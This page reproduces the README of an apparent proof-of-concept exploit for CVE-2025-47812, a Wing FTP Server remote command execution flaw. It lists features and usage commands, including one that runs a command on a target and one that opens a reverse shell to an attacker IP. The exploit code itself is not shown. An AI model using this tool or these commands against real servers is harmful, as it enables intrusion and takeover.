来源

关联漏洞

描述

Remote Command Execution exploit for Wing FTP Server (CVE-2025-47812)

介绍

# CVE-2025-47812 - Wing FTP Server RCE Exploit

This repository provides a proof-of-concept exploit for **CVE-2025-47812**, a remote command execution (RCE) vulnerability in **Wing FTP Server**. An attacker can inject and execute arbitrary Lua-based system commands by abusing the `username` parameter during authentication, resulting in full remote code execution.

---

## 📌 Exploit Features

- 🔧 Remote execution of custom shell commands
- 🧬 Multiple built-in reverse shell payloads (bash, Python, netcat, etc.)
- 🪪 Automatic UID extraction from Set-Cookie
- 📦 Logs successful UIDs to `found_uids.txt`
- 🧪 Dry-run mode (no actual requests sent — test your input/output logic safely)
- 🔁 Retry logic on network failure
- 🧹 Cleaner payload formatting and readable output
- ✅ Input validation for IPs, ports, and URLs
- ⚙️ Command-line argument support for automated workflows

---

## 💻 Usage

**Execute a simple shell command:**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
```
Trigger a reverse shell:
```
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
```
Dry-run mode (no requests will be sent):
```
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
```

## 🔄 Changes Made to the Original Exploit

| Feature/Improvement       | Description                                                                 |
|---------------------------|-----------------------------------------------------------------------------|
| ✅ **Argument Parsing**    | Added `argparse` CLI support for non-interactive mode                       |
| 🔐 **Input Validation**    | Ensures valid URL/IP/port before attempting exploit                         |
| 📦 **Header Refactoring** | Extracted HTTP headers into a reusable function for consistency             |
| 📄 **UID Logging**         | Saves successful UID tokens to `found_uids.txt`                            |
| 🧪 **Dry-Run Mode**        | Allows safe testing without sending requests (`--dry-run`)                  |
| 🕒 **Timeout + Retries**   | Adds request timeout and automatic retry attempts on failure                |
| 🧼 **Payload Readability** | Reformatted the Lua injection string for clarity and maintenance            |
| 📊 **Structured Output**   | Wrapped server responses and payload info with delimiters for easy reading  |
| ⚠️ **Status Code Checks** | Warns user if the target returns unexpected HTTP status codes               |
| 📝 **Logging System**      | Replaces `print()` with Python `logging` module for better verbosity control|

---

## ⚠️ Disclaimer

This project is intended for **educational and authorized security testing only**.  
Do **not** use this tool against systems you do not own or have explicit permission to test.

---

---

文件快照

 [4.0K]  /data/pocs/96bc979776d7c75cdbce6d1017e26ba83f15cff6
├── [6.0K]  CVE-2025-47812.py
├── [1.0K]  LICENSE
└── [2.8K]  README.md

0 directories, 3 files

备注